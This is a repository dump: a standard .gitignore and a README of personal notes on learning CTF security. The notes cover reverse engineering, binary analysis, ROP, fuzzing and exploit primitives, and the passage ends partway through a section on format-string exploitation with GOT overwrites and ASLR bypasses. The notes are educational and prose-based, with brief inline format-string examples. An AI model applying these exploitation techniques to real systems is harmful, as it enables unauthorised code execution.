├── .gitignore
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
 1 | 
 2 | # Created by https://www.gitignore.io/api/vim,linux,emacs
 3 | 
 4 | ### Emacs ###
 5 | # -*- mode: gitignore; -*-
 6 | *~
 7 | \#*\#
 8 | /.emacs.desktop
 9 | /.emacs.desktop.lock
10 | *.elc
11 | auto-save-list
12 | tramp
13 | .\#*
14 | 
15 | # Org-mode
16 | .org-id-locations
17 | *_archive
18 | 
19 | # flymake-mode
20 | *_flymake.*
21 | 
22 | # eshell files
23 | /eshell/history
24 | /eshell/lastdir
25 | 
26 | # elpa packages
27 | /elpa/
28 | 
29 | # reftex files
30 | *.rel
31 | 
32 | # AUCTeX auto folder
33 | /auto/
34 | 
35 | # cask packages
36 | .cask/
37 | dist/
38 | 
39 | # Flycheck
40 | flycheck_*.el
41 | 
42 | # server auth directory
43 | /server/
44 | 
45 | # projectiles files
46 | .projectile
47 | 
48 | # directory configuration
49 | .dir-locals.el
50 | 
51 | ### Linux ###
52 | 
53 | # temporary files which can be created if a process still has a handle open of a deleted file
54 | .fuse_hidden*
55 | 
56 | # KDE directory preferences
57 | .directory
58 | 
59 | # Linux trash folder which might appear on any partition or disk
60 | .Trash-*
61 | 
62 | # .nfs files are created when an open file is removed but is still being accessed
63 | .nfs*
64 | 
65 | ### Vim ###
66 | # swap
67 | [._]*.s[a-v][a-z]
68 | [._]*.sw[a-p]
69 | [._]s[a-v][a-z]
70 | [._]sw[a-p]
71 | # session
72 | Session.vim
73 | # temporary
74 | .netrwhist
75 | # auto-generated tag files
76 | tags
77 | 
78 | # End of https://www.gitignore.io/api/vim,linux,emacs
79 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Some security related notes
  2 | 
  3 | I have started to write down notes on the security related videos I
  4 | watch (as a way of quick recall).
  5 | 
  6 | These might be more useful to beginners.
  7 | 
  8 | The order of notes here is _not_ in order of difficulty, but in
  9 | reverse chronological order of how I write them (i.e., latest first).
 10 | 
 11 | ## License
 12 | 
 13 | [![CC BY-NC-SA 4.0](https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png)](http://creativecommons.org/licenses/by-nc-sa/4.0/)
 14 | 
 15 | This work is licensed under a [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-nc-sa/4.0/).
 16 | 
 17 | ## The Notes Themselves
 18 | 
 19 | ### Misc RE tips
 20 | 
 21 | Written on Aug 12 2017
 22 | 
 23 | > Influenced by Gynvael's CONFidence CTF 2017
 24 | > Livestreams [here](https://www.youtube.com/watch?v=kZtHy9GqQ8o)
 25 | > and [here](https://www.youtube.com/watch?v=W7s5CWaw6I4); and by his
 26 | > Google CTF Quals 2017
 27 | > Livestream [here](https://www.youtube.com/watch?v=KvyBn4Btv8E)
 28 | 
 29 | Sometimes, a challenge might implement a complicated task by
 30 | implementing a VM. It is not always necessary to completely reverse
 31 | engineer the VM and work on solving the challenge. Sometimes, you can
 32 | RE a little bit, and once you know what is going on, you can hook into
 33 | the VM, and get access to stuff that you need. Additionally, timing
 34 | based side-channel attacks become easier in VMs (mainly due to more
 35 | number of _"real"_ instructions executed.
 36 | 
 37 | Cryptographically interesting functions in binaries can be recognized
 38 | and quickly RE'd simply by looking for the constants and searching for
 39 | them online. For standard crypto functions, these constants are
 40 | sufficient to quickly guess at a function. Simpler crypto functions
 41 | can be recognized even more easily. If you see a lot of XORs and stuff
 42 | like that happening, and no easily identifiable constants, it is
 43 | probably hand-rolled crypto (and also possibly broken).
 44 | 
 45 | Sometimes, when using IDA with HexRays, the disassembly view might be
 46 | better than the decompilation view. This is especially true if you
 47 | notice that there seems to be a lot of complication going on in the
 48 | decompilation view, but you notice repetitive patterns in the
 49 | disassembly view. (You can quickly switch b/w the two using the space
 50 | bar). For example, if there is a (fixed size) big-integer library
 51 | implemented, then the decompilation view is terrible, but the
 52 | disassembly view is easy to understand stuff (and easily recognizable
 53 | due to the repetitive "with-carry" instructions such as
 54 | `adc`). Additionally, when analyzing like this, using the "Group
 55 | Nodes" feature in IDA's graph view is extremely useful to quickly
 56 | reduce the complexity of your graph, as you understand what each node
 57 | does.
 58 | 
 59 | For weird architectures, having a good emulator is extremely
 60 | useful. Especially, an emulator that can give you a dump of the memory
 61 | can be used to quickly figure out what is going on, and recognize
 62 | interesting portions, once you have the memory out of the
 63 | emulator. Additionally, using an emulator implemented in a comfortable
 64 | language (such as Python), means that you could run things exactly how
 65 | you like. For example, if there is some interesting part of the code
 66 | you might wish to run multiple times (for example, to brute force or
 67 | something), then using the emulator, you can quickly code up something
 68 | that does only that part of the code, rather than having to run the
 69 | complete program.
 70 | 
 71 | Being lazy is good, when REing. Do NOT waste time reverse engineering
 72 | everything, but spend enough time doing recon (even in an RE
 73 | challenge!), so as to be able to reduce the time spent on actually
 74 | doing the more difficult task of REing. What recon, in such a
 75 | situation means, is to just take quick looks at different functions,
 76 | without spending too much time on analyzing each function
 77 | thoroughly. You just quickly gauge what the function might be about
 78 | (for example "looks like a crypto thing", or "looks like a memory
 79 | management thing", etc.)
 80 | 
 81 | For unknown hardware or architecture, spend enough time looking it up
 82 | on Google, you might get lucky with a bunch of useful tools or
 83 | documents that might help you build tools quicker. Often times, you'll
 84 | find toy emulator etc implementations that might be useful as a quick
 85 | point to start off from. Alternatively, you might get some interesting
 86 | info (such as how bitmaps are stored, or how strings are stored, or
 87 | something) with which you can write a quick "fix" script, and then use
 88 | normal tools to see if interesting stuff is there.
 89 | 
 90 | Gimp (the image manipulation tool), has a very cool open/load
 91 | functionality to see raw pixel data. You can use this to quickly look
 92 | for assets or repetitive structures in raw binary data. Do spend time
 93 | messing around with the settings to see if more info can be gleaned
 94 | from it.
 95 | 
 96 | ### Analysis for RE and Pwning tasks in CTFs
 97 | 
 98 | Written on Jul 2 2017
 99 | 
100 | > Influenced by a discussion with [@p4n74](https://github.com/p4n74/)
101 | > and [@h3rcul35](https://github.com/aazimcr) on
102 | > the [InfoSecIITR](https://github.com/InfoSecIITR/) #bin chat. We
103 | > were discussing on how sometimes beginners struggle to start with a
104 | > larger challenge binary, especially when it is stripped.
105 | 
106 | To either solve the RE challenge, or to be able to pwn it, one must
107 | first analyze the given binary, in order to be able to effectively
108 | exploit it. Since the binary might possibly be stripped etc (found
109 | using `file`) one must know where to begin analysis, to get a foothold
110 | to build up from.
111 | 
112 | There's a few styles of analysis, when looking for vulnerabilities in
113 | binaries (and from what I have gathered, different CTF teams have
114 | different preferences):
115 | 
116 | 1. Static Analysis
117 | 
118 |  1.1. Transpiling complete code to C
119 | 
120 |   This kind of analysis is sort of rare, but is quite useful for
121 |   smaller binaries. The idea is to go in an reverse engineer the
122 |   entirety of the code. Each and every function is opened in IDA
123 |   (using the decompiler view), and renaming (shortcut: n) and retyping
124 |   (shortcut: y) are used to quickly make the decompiled code much more
125 |   readable. Then, all the code is copied/exported into a separate .c
126 |   file, which can be compiled to get an equivalent (but not same)
127 |   binary to the original. Then, source code level analysis can be
128 |   done, to find vulns etc. Once the point of vulnerability is found,
129 |   then the exploit is built on the original binary, by following along
130 |   in the nicely decompiled source in IDA, side by side with the
131 |   disassembly view (use Tab to quickly switch between the two; and use
132 |   Space to switch quickly between Graph and Text view for
133 |   disassembly).
134 | 
135 |  1.2. Minimal analysis of decompilation
136 | 
137 |   This is done quite often, since most of the binary is relatively
138 |   useless (from the attacker's perspective). You only need to analyze
139 |   the functions that are suspicious or might lead you to the vuln. To
140 |   do this, there are some approaches to start off:
141 | 
142 |   1.2.1. Start from main
143 | 
144 |    Now usually, for a stripped binary, even main is not labelled (IDA
145 |    6.9 onwards does mark it for you though), but over time, you learn
146 |    to recognize how to reach the main from the entry point (where IDA
147 |    opens at by default). You jump to that and start analyzing from
148 |    there.
149 | 
150 |   1.2.2. Find relevant strings
151 | 
152 |    Sometimes, you know some specific strings that might be outputted
153 |    etc, that you know might be useful (for example "Congratulations,
154 |    your flag is %s" for an RE challenge). You can jump to Strings View
155 |    (shortcut: Shift+F12), find the string, and work backwards using
156 |    XRefs (shortcut: x). The XRefs let you find the path of functions
157 |    to that string, by using XRefs on all functions in that chain,
158 |    until you reach main (or some point that you know).
159 | 
160 |   1.2.3. From some random function
161 | 
162 |    Sometimes, not specific string might be useful, and you don't want
163 |    to start from main. So instead, you quickly flip through the whole
164 |    functions list, looking for functions that look suspicious (such as
165 |    having lots of constants, or lots of xors, etc) or call important
166 |    functions (XRefs of malloc, free, etc), and you start off from
167 |    there, and go both forwards (following functions it calls) and
168 |    backwards (XRefs of the function)
169 | 
170 |  1.3. Pure disassembly analysis
171 | 
172 |   Sometimes, you cannot use the decompilation view (because of weird
173 |   architecture, or anti-decompilation techniques, or hand written
174 |   assembly, or decompilation looking too unnecessarily complex). In
175 |   that case, it is perfectly valid to look purely at the disassembly
176 |   view. It is extremely useful (for new architectures) to turn on Auto
177 |   Comments, which shows a comment explaining each
178 |   instruction. Additionally, the node colorization and group nodes
179 |   functionalities are immensely helpful. Even if you don't use any of
180 |   these, regularly marking comments in the disassembly helps a lot. If
181 |   I am personally doing this, I prefer writing down Python-like
182 |   comments, so that I can quickly then transpile in manually into
183 |   Python (especially useful for RE challenges, where you might have to
184 |   use Z3 etc).
185 | 
186 |  1.4. Using platforms like BAP, etc.
187 | 
188 |   This kind of analysis is (semi-)automated, and is usually more
189 |   useful for much larger software, and is rarely directly used in
190 |   CTFs.
191 | 
192 | 2. Fuzzing
193 | 
194 |  Fuzzing can be an effective technique to quickly get to the vuln,
195 |  without having to actually understand it initially. By using a
196 |  fuzzer, one can get a lot of low-hanging-fruit style of vulns, which
197 |  then need to be analyzed and triaged to get to the actual vuln. See
198 |  my notes
199 |  on
200 |  [basics of fuzzing](https://github.com/jaybosamiya/security-notes#basics-of-fuzzing) and
201 |  [genetic fuzzing](https://github.com/jaybosamiya/security-notes#genetic-fuzzing) for
202 |  more info.
203 | 
204 | 3. Dynamic Analysis
205 | 
206 |  Dynamic Analysis can be used after finding a vuln using static
207 |  analysis, to help build exploits quickly. Alternatively, it can be
208 |  used to find the vuln itself. Usually, one starts up the executable
209 |  inside a debugger, and tries to go along code paths that trigger the
210 |  bug. By placing breakpoints at the right locations, and analyzing the
211 |  state of the registers/heap/stack/etc, one can get a good idea of
212 |  what is going on.  One can also use debuggers to quickly identify
213 |  interesting functions. This can be done, for example, by setting
214 |  temporary breakpoints on all functions initially; then proceeding to
215 |  do 2 walks - one through all uninteresting code paths; and one
216 |  through only a single interesting path. The first walk trips all the
217 |  uninteresting functions and disables those breakpoints, thereby
218 |  leaving the interesting ones showing up as breakpoints during the
219 |  second walk.
220 | 
221 | My personal style for analysis, is to start with static analysis,
222 | usually from main (or for non-console based applications, from
223 | strings), and work towards quickly finding a function that looks
224 | odd. I then spend time and branch out forwards and backwards from
225 | here, regularly writing down comments, and continuously renaming and
226 | retyping variables to improve the decompilation. Like others, I do use
227 | names like Apple,Banana,Carrot,etc for seemingly useful, but as of yet
228 | unknown functions/variables/etc, to make it easier to analyze (keeping
229 | track of func_123456 style of names is too difficult for me). I also
230 | regularly use the Structures view in IDA to define structures (and
231 | enums) to make the decompilation even nicer. Once I find the vuln, I
232 | usually move to writing a script with pwntools (and use that to call a
233 | `gdb.attach()`). This way, I can get a lot of control over what is
234 | going on. Inside gdb, I usually use plain gdb, though I have added a
235 | command `peda` that loads peda instantly if needed.
236 | 
237 | My style is definitely evolving though, as I have gotten more
238 | comfortable with my tools, and also with custom tools I have written
239 | to speed things up. I would be happy to hear of other analysis styles,
240 | as well as possible changes to my style that might help me get
241 | faster. For any comments/criticisms/praise you have, as always, I can
242 | be reached on Twitter [@jay\_f0xtr0t](http://twitter.com/@jay_f0xtr0t).
243 | 
244 | ### Return Oriented Programming
245 | 
246 | Written on Jun 4 2017
247 | 
248 | > Influenced by [this](https://www.youtube.com/watch?v=iwRSFlZoSCM)
249 | > awesome live stream by Gynvael Coldwind, where he discusses the
250 | > basics of ROP, and gives a few tips and tricks
251 | 
252 | Return Oriented Programming (ROP) is one of the classic exploitation
253 | techniques, that is used to bypass the NX (non executable memory)
254 | protection. Microsoft has incorporated NX as DEP (data execution
255 | prevention). Even Linux etc, have it effective, which means that with
256 | this protection, you could no longer place shellcode onto heap/stack
257 | and have it execute just by jumping to it. So now, to be able to
258 | execute code, you jump into pre-existing code (main binary, or its
259 | libraries -- libc, ldd etc on Linux; kernel32, ntdll etc on
260 | Windows). ROP comes into existence by re-using fragments of this code
261 | that is already there, and figuring out a way to combine those
262 | fragments into doing what you want to do (which is of course, HACK THE
263 | PLANET!!!).
264 | 
265 | Originally, ROP started with ret2libc, and then became more advanced
266 | over time by using many more small pieces of code. Some might say that
267 | ROP is now "dead", due to additional protections to mitigate it, but
268 | it still can be exploited in a lot of scenarios (and definitely
269 | necessary for many CTFs).
270 | 
271 | The most important part of ROP, is the gadgets. Gadgets are "usable
272 | pieces of code for ROP". That usually means pieces of code that end
273 | with a `ret` (but other kinds of gadgets might also be useful; such as
274 | those ending with `pop eax; jmp eax` etc). We chain these gadgets
275 | together to form the exploit, which is known as the _ROP chain_.
276 | 
277 | One of the most important assumptions of ROP is that you have control
278 | over the stack (i.e., the stack pointer points to a buffer that you
279 | control). If this is not true, then you will need to apply other
280 | tricks (such as stack pivoting) to gain this control before building a
281 | ROP chain.
282 | 
283 | How do you extract gadgets? Use downloadable tools (such
284 | as [ropgadget](http://shell-storm.org/project/ROPgadget/)) or online
285 | tool (such as [ropshell](http://ropshell.com/)) or write your own
286 | tools (might be more useful for more difficult challenges sometimes,
287 | since you can tweak it to the specific challenge if need
288 | be). Basically, we just need the addresses that we can jump to for
289 | these gadgets. This is where there might be a problem with ASLR etc
290 | (in which case, you get a leak of the address, before moving on to
291 | actually doing ROP).
292 | 
293 | So now, how do we use these gadgets to make a ropchain? We first look
294 | for "basic gadgets". These are gadgets that can do _simple_ tasks for
295 | us (such as `pop ecx; ret`, which can be used to load a value into ecx
296 | by placing the gadget, followed by the value to be loaded, followed by
297 | rest of chain, which is returned to after the value is loaded). The
298 | most useful basic gadgets, are usually "set a register", "store
299 | register value at address pointed to by register", etc.
300 | 
301 | We can build up from these primitive functions to gain higher level
302 | functionality (similar to my post
303 | titled [exploitation abstraction](#exploitation-abstraction)). For
304 | example, using the set-register, and store-value-at-address gadgets,
305 | we can come up with a "poke" function, that lets us set any specific
306 | address with a specific value. Using this, we can build a
307 | "poke-string" function that lets us store any particular string at any
308 | particular location in memory. Now that we have poke-string, we are
309 | basically almost done, since we can create any structures that we want
310 | in memory, and can also call any functions we want with the parameters
311 | we want (since we can set-register, and can place values on stack).
312 | 
313 | One of the most important reasons to build from these lower order
314 | primitives to larger functions that do more complex things, is to
315 | reduce the chances of making mistakes (which is common in ROP
316 | otherwise).
317 | 
318 | There are more complex ideas, techniques, and tips for ROP, but that
319 | is possibly a topic for a separate note, for a different time :)
320 | 
321 | PS: Gyn has a blogpost
322 | on [Return-Oriented Exploitation](http://gynvael.coldwind.pl/?id=149)
323 | that might be worth a read.
324 | 
325 | ### Genetic Fuzzing
326 | 
327 | Written on May 27 2017; extended on May 29 2017
328 | 
329 | > Influenced by [this](https://www.youtube.com/watch?v=JhsHGms_7JQ)
330 | > amazing live stream by Gynvael Coldwind, where he talks about the
331 | > basic theory behind genetic fuzzing, and starts to build a basic
332 | > genetic fuzzer.  He then proceeds to complete the implementation
333 | > in [this](https://www.youtube.com/watch?v=HN_tI601jNU) live stream.
334 | 
335 | "Advanced" fuzzing (compared to a blind fuzzer, described in
336 | my ["Basics of Fuzzing"](#basics-of-fuzzing) note). It also
337 | modifies/mutates bytes etc, but it does it a little bit smarter than
338 | the blind "dumb" fuzzer.
339 | 
340 | Why do we need a genetic fuzzer?
341 | 
342 | Some programs might be "nasty" towards dumb fuzzers, since it is
343 | possible that a vulnerability might require a whole bunch of
344 | conditions to be satisfied to be reached. In a dumb fuzzer, we have
345 | very low probability of this happening since it doesn't have any idea
346 | if it is making any progress or not. As a specific example, if we have
347 | the code `if a: if b: if c: if d: crash!` (let's call it the CRASHER
348 | code), then in this case we need 4 conditions to be satisfied to crash
349 | the program. However, a dumb fuzzer might be unable to get past the
350 | `a` condition, just because there is very low chance that all 4
351 | mutations `a`, `b`, `c`, `d`, happen at same time. In fact, even if it
352 | progresses by doing just `a`, the next mutation might go back to `!a`
353 | just because it doesn't know anything about the program.
354 | 
355 | Wait, when does this kind of "bad case" program show up?
356 | 
357 | It is quite common in file format parsers, to take one example. To
358 | reach some specific code paths, one might need to go past multiple
359 | checks "this value must be this, and that value must be that, and some
360 | other value must be something of something else" and so
361 | on. Additionally, almost no real world software is "uncomplicated",
362 | and most software has many many many possible code paths, some of
363 | which can be accessed only after many things in the state get set up
364 | correctly. Thereby, many of these programs' code paths are basically
365 | inaccessible to dumb fuzzers. Additionally, sometimes, some paths
366 | might be completely inaccessible (rather than just crazily improbable)
367 | due to not enough mutations done whatsoever. If any of these paths
368 | have bugs, a dumb fuzzer would never be able to find them.
369 | 
370 | So how do we do better than dumb fuzzers?
371 | 
372 | Consider the Control Flow Graph (CFG) of the above mentioned CRASHER
373 | code. If by chance a dumb fuzzer suddenly got `a` correct, then too it
374 | would not recognize that it reached a new node, but it would continue
375 | ignoring this, discarding the sample. On the other hand, what AFL (and
376 | other genetic or "smart" fuzzers) do, is they recognize this as a new
377 | piece of information ("a newly reached path") and store this sample as
378 | a new initial point into the corpus. What this means is that now the
379 | fuzzer can start from the `a` block and move further. Of course,
380 | sometimes, it might go back to the `!a` from the `a` sample, but most
381 | of the time, it will not, and instead might be able to reach `b`
382 | block. This again is a new node reached, so adds a new sample into the
383 | corpus. This continues, allowing more and more possible paths to be
384 | checked, and finally reaches the `crash!`.
385 | 
386 | Why does this work?
387 | 
388 | By adding mutated samples into the corpus, that explore the graph more
389 | (i.e. reach parts not explored before), we can reach previously
390 | unreachable areas, and can thus fuzz such areas. Since we can fuzz
391 | such areas, we might be able to uncover bugs in those regions.
392 | 
393 | Why is it called genetic fuzzing?
394 | 
395 | This kind of "smart" fuzzing is kind of like genetic
396 | algorithms. Mutation and crossover of specimens causes new
397 | specimens. We keep specimens which are better suited to the conditions
398 | which are tested. In this case, the condition is "how many nodes in
399 | the graph did it reach?". The ones that traverse more can be
400 | kept. This is not exactly like genetic algos, but is a variation
401 | (since we keep all specimens that traverse unexplored territory, and
402 | we don't do crossover) but is sufficiently similar to get the same
403 | name. Basically, choice from pre-existing population, followed by
404 | mutation, followed by fitness testing (whether it saw new areas), and
405 | repeat.
406 | 
407 | Wait, so we just keep track of unreached nodes?
408 | 
409 | Nope, not really. AFL keeps track of edge traversals in the graph,
410 | rather than nodes. Additionally, it doesn't just say "edge travelled
411 | or not", it keeps track of how many times an edge was traversed. If an
412 | edge is traversed 0, 1, 2, 4, 8, 16, ... times, it is considered as a
413 | "new path" and leads to addition into the corpus. This is done because
414 | looking at edges rather than nodes is a better way to distinguish
415 | between application states, and using an exponentially increasing
416 | count of the edge traversals gives more info (an edge traversed once
417 | is quite different from traversed twice, but traversed 10 is not too
418 | different from 11 times).
419 | 
420 | So, what and all do you need in a genetic fuzzer?
421 | 
422 | We need 2 things, the first part is called the tracer (or tracing
423 | instrumentation). It basically tells you which instructions were
424 | executed in the application. AFL does this in a simple way by jumping
425 | in between the compilation stages. After the generation of the
426 | assembly, but before assembling the program, it looks for basic blocks
427 | (by looking for endings, by checking for jump/branch type of
428 | instructions), and adds code to each block that marks the block/edge
429 | as executed (probably into some shadow memory or something). If we
430 | don't have source code, we can use other techniques for tracing (such
431 | as pin, debugger, etc). Turns out, even ASAN can give coverage
432 | information (see docs for this).
433 | 
434 | For the second part, we then use the coverage information given by the
435 | tracer to keep track of new paths as they appear, and add those
436 | generated samples into the corpus for random selection in the future.
437 | 
438 | There are multiple mechanisms to make the tracer. They can be software
439 | based, or hardware based. For hardware based, there are, for example,
440 | some Intel CPU features exist where given a buffer in memory, it
441 | records information of all basic blocks traversed into that buffer. It
442 | is a kernel feature, so the kernel has to support it and provide it as
443 | an API (which Linux does). For software based, we can do it by adding
444 | in code, or using a debugger (using temporary breakpoints, or through
445 | single stepping), or use address sanitizer's tracing abilities, or use
446 | hooks, or emulators, or a whole bunch of other ways.
447 | 
448 | Another way to differentiate the mechanisms is by either black-box
449 | tracing (where you can only use the unmodified binary), or software
450 | white-box tracing (where you have access to the source code, and
451 | modify the code itself to add in tracing code).
452 | 
453 | AFL uses software instrumentation during compilation as the method for
454 | tracing (or through QEMU emulation). Honggfuzz supports both software
455 | and hardware based tracing methods. Other smart fuzzers might be
456 | different. The one that Gyn builds uses the tracing/coverage provided
457 | by address sanitizer (ASAN).
458 | 
459 | Some fuzzers use "speedhacks" (i.e. increase fuzzing speed) such as by
460 | making a forkserver or other such ideas. Might be worth looking into
461 | these at some point :)
462 | 
463 | ### Basics of Fuzzing
464 | 
465 | Written on 20th April 2017
466 | 
467 | > Influenced by [this](https://www.youtube.com/watch?v=BrDujogxYSk)
468 | > awesome live stream by Gynvael Coldwind, where he talks about what
469 | > fuzzing is about, and also builds a basic fuzzer from scratch!
470 | 
471 | What is a fuzzer, in the first place? And why do we use it?
472 | 
473 | Consider that we have a library/program that takes input data. The
474 | input may be structured in some way (say a PDF, or PNG, or XML, etc;
475 | but it doesn't need to be any "standard" format). From a security
476 | perspective, it is interesting if there is a security boundary between
477 | the input and the process / library / program, and we can pass some
478 | "special input" which causes unintended behaviour beyond that
479 | boundary. A fuzzer is one such way to do this. It does this by
480 | "mutating" things in the input (thereby _possibly_ corrupting it), in
481 | order to lead to either a normal execution (including safely handled
482 | errors) or a crash. This can happen due to edge case logic not being
483 | handled well.
484 | 
485 | Crashing is the easiest way for error conditions. There might be
486 | others as well. For example, using ASAN (address sanitizer) etc might
487 | lead to detecting more things as well, which might be security
488 | issues. For example, a single byte overflow of a buffer might not
489 | cause a crash on its own, but by using ASAN, we might be able to catch
490 | even this with a fuzzer.
491 | 
492 | Another possible use for a fuzzer is that inputs generated by fuzzing
493 | one program can also possibly be used in another library/program and
494 | see if there are differences. For example, some high-precision math
495 | library errors were noticed like this. This doesn't usually lead to
496 | security issues though, so we won't concentrate on this much.
497 | 
498 | How does a fuzzer work?
499 | 
500 | A fuzzer is basically a mutate-execute-repeat loop that explores the
501 | state space of the application to try to "randomly" find states of a
502 | crash / security vuln. It does _not_ find an exploit, just a vuln. The
503 | main part of the fuzzer is the mutator itself. More on this later.
504 | 
505 | Outputs from a fuzzer?
506 | 
507 | In the fuzzer, a debugger is (sometimes) attached to the application
508 | to get some kind of a report from the crash, to be able to analyze it
509 | later as security vuln vs a benign (but possibly important) crash.
510 | 
511 | How to determine what areas of programs are best to fuzz first?
512 | 
513 | When fuzzing, we want to usually concentrate on a single piece or
514 | small set of piece of the program. This is usually done mainly to
515 | reduce the amount of execution to be done. Usually, we concentrate on
516 | the parsing and processing only. Again, the security boundary matters
517 | a _lot_ in deciding which parts matter to us.
518 | 
519 | Types of fuzzers?
520 | 
521 | Input samples given to the fuzzer are called the _corpus_. In
522 | oldschool fuzzers (aka "blind"/"dumb" fuzzzers) there was a necessity
523 | for a large corpus. Newer ones (aka "genetic" fuzzers, for example
524 | AFL) do not necessarily need such a large corpus, since they explore
525 | the state on their own.
526 | 
527 | How are fuzzers useful?
528 | 
529 | Fuzzers are mainly useful for "low hanging fruit". It won't find
530 | complicated logic bugs, but it can find easy to find bugs (which are
531 | actually sometimes easy to miss out during manual analysis).  While I
532 | might say _input_ throughout this note, and usually refer to an _input
533 | file_, it need not be just that. Fuzzers can handle inputs that might
534 | be stdin or input file or network socket or many others. Without too
535 | much loss of generality though, we can think of it as just a file for
536 | now.
537 | 
538 | How to write a (basic) fuzzer?
539 | 
540 | Again, it just needs to be a mutate-run-repeat loop. We need to be
541 | able to call the target often (`subprocess.Popen`). We also need to be
542 | able to pass input into the program (eg: files) and detect crashes
543 | (`SIGSEGV` etc cause exceptions which can be caught). Now, we just
544 | have to write a mutator for the input file, and keep calling the
545 | target on the mutated files.
546 | 
547 | Mutators? What?!?
548 | 
549 | There can be multiple possible mutators. Easy (i.e. simple to
550 | implement) ones might be to mutate bits, mutate bytes, or mutate to
551 | "magic" values. To increase chance of crash, instead of changing only
552 | 1 bit or something, we can change multiple (maybe some parameterized
553 | percentage of them?). We can also (instead of random mutations),
554 | change bytes/words/dwords/etc to some "magic" values. The magic values
555 | might be `0`, `0xff`, `0xffff`, `0xffffffff`, `0x80000000` (32-bit
556 | `INT_MIN`), `0x7fffffff` (32-bit `INT_MAX`) etc. Basically, pick ones
557 | that are common to causing security issues (because they might trigger
558 | some edge cases). We can write smarter mutators if we know more info
559 | about the program (for example, for string based integers, we might
560 | write something that changes an integer string to `"65536"` or `-1`
561 | etc). Chunk based mutators might move pieces around (basically,
562 | reorganizing input). Additive/appending mutators also work (for
563 | example causing larger input into buffer). Truncators also might work
564 | (for example, sometimes EOF might not be handled well). Basically, try
565 | a whole bunch of creative ways of mangling things. The more experience
566 | with respect to the program (and exploitation in general), the more
567 | useful mutators might be possible.
568 | 
569 | But what is this "genetic" fuzzing?
570 | 
571 | That is probably a discussion for a later time. However, a couple of
572 | links to some modern (open source) fuzzers
573 | are [AFL](http://lcamtuf.coredump.cx/afl/)
574 | and [honggfuzz](https://github.com/google/honggfuzz).
575 | 
576 | ### Exploitation Abstraction
577 | 
578 | Written on 7th April 2017
579 | 
580 | > Influenced from a nice challenge
581 | > in [PicoCTF 2017](http://2017.picoctf.com/) (name of challenge
582 | > withheld, since the contest is still under way)
583 | 
584 | WARNING: This note might seem simple/obvious to some readers, but it
585 | necessitates saying, since the layering wasn't crystal clear to me
586 | until very recently.
587 | 
588 | Of course, when programming, all of us use abstractions, whether they
589 | be classes and objects, or functions, or meta-functions, or
590 | polymorphism, or monads, or functors, or all that jazz. However, can
591 | we really have such a thing during exploitation? Obviously, we can
592 | exploit mistakes that are made in implementing the aforementioned
593 | abstractions, but here, I am talking about something different.
594 | 
595 | Across multiple CTFs, whenever I've written an exploit previously, it
596 | has been an ad-hoc exploit script that drops a shell. I use the
597 | amazing pwntools as a framework (for connecting to the service, and
598 | converting things, and DynELF, etc), but that's about it. Each exploit
599 | tended to be an ad-hoc way to work towards the goal of arbitrary code
600 | execution. However, this current challenge, as well as thinking about
601 | my previous note
602 | on
603 | ["Advanced" Format String Exploitation](#advanced-format-string-exploitation),
604 | made me realize that I could layer my exploits in a consistent way,
605 | and move through different abstraction layers to finally reach the
606 | requisite goal.
607 | 
608 | As an example, let us consider the vulnerability to be a logic error,
609 | which lets us do a read/write of 4 bytes, somewhere in a small range
610 | _after_ a buffer. We want to abuse this all the way to gaining code
611 | execution, and finally the flag.
612 | 
613 | In this scenario, I would consider this abstraction to be a
614 | `short-distance-write-anything` primitive. With this itself, obviously
615 | we cannot do much. Nevertheless, I make a small Python function
616 | `vuln(offset, val)`. However, since just after the buffer, there may
617 | be some data/meta-data that might be useful, we can abuse this to
618 | build both `read-anywhere` and `write-anything-anywhere`
619 | primitives. This means, I write short Python functions that call the
620 | previously defined `vuln()` function. These `get_mem(addr)` and
621 | `set_mem(addr, val)` functions are made simply (in this current
622 | example) simply by using the `vuln()` function to overwrite a pointer,
623 | which can then be dereferenced elsewhere in the binary.
624 | 
625 | Now, after we have these `get_mem()` and `set_mem()` abstractions, I
626 | build an anti-ASLR abstraction, by basically leaking 2 addresses from
627 | the GOT through `get_mem()` and comparing against
628 | a [libc database](https://github.com/niklasb/libc-database) (thanks
629 | @niklasb for making the database). The offsets from these give me a
630 | `libc_base` reliably, which allows me to replace any function in
631 | the GOT with another from libc.
632 | 
633 | This has essentially given me control over EIP (the moment I can
634 | "trigger" one of those functions _exactly_ when I want to). Now, all
635 | that remains is for me to call the trigger with the right parameters.
636 | So I set up the parameters as a separate abstraction, and then call
637 | `trigger()` and I have shell access on the system.
638 | 
639 | TL;DR: One can build small exploitation primitives (which do not have
640 | too much power), and by combining them and building a hierarchy of
641 | stronger primitives, we can gain complete execution.
642 | 
643 | ### "Advanced" Format String Exploitation
644 | 
645 | Written on 6th April 2017
646 | 
647 | > Influenced by [this](https://www.youtube.com/watch?v=xAdjDEwENCQ)
648 | > awesome live stream by Gynvael Coldwind, where he talks about format
649 | > string exploitation
650 | 
651 | Simple format string exploits:
652 | 
653 | You can use the `%p` to see what's on the stack. If the format string
654 | itself is on the stack, then one can place an address (say _foo_) onto
655 | the stack, and then seek to it using the position specifier `n$` (for
656 | example, `AAAA %7$p` might return `AAAA 0x41414141`, if 7 is the
657 | position on the stack). We can then use this to build a **read-where**
658 | primitive, using the `%s` format specifier instead (for example, `AAAA
659 | %7$s` would return the value at the address 0x41414141, continuing the
660 | previous example). We can also use the `%n` format specifier to make
661 | it into a **write-what-where** primitive. Usually instead, we use
662 | `%hhn` (a glibc extension, iirc), which lets us write one byte at a
663 | time.
664 | 
665 | We use the above primitives to initially beat ASLR (if any) and then
666 | overwrite an entry in the GOT (say `exit()` or `fflush()` or ...) to
667 | then raise it to an **arbitrary-eip-control** primitive, which
668 | basically gives us **arbitrary-code-execution**.
669 | 
670 | Possible difficulties (that make it "advanced" exploitation):
671 | 
672 | If we have **partial ASLR**, then we can still use format strings and
673 | beat it, but this becomes much harder if we only have one-shot exploit
674 | (i.e., our exploit needs to run instantaneously, and the addresses are
675 | randomized on each run, say). The way we would beat this is to use
676 | addresses that are already in the memory, and overwrite them partially
677 | (since ASLR affects only higher order bits). This way, we can gain
678 | reliability during execution.
679 | 
680 | If we have a **read only .GOT** section, then the "standard" attack of
681 | overwriting the GOT will not work. In this case, we look for
682 | alternative areas that can be overwritten (preferably function
683 | pointers). Some such areas are: `__malloc_hook` (see `man` page for
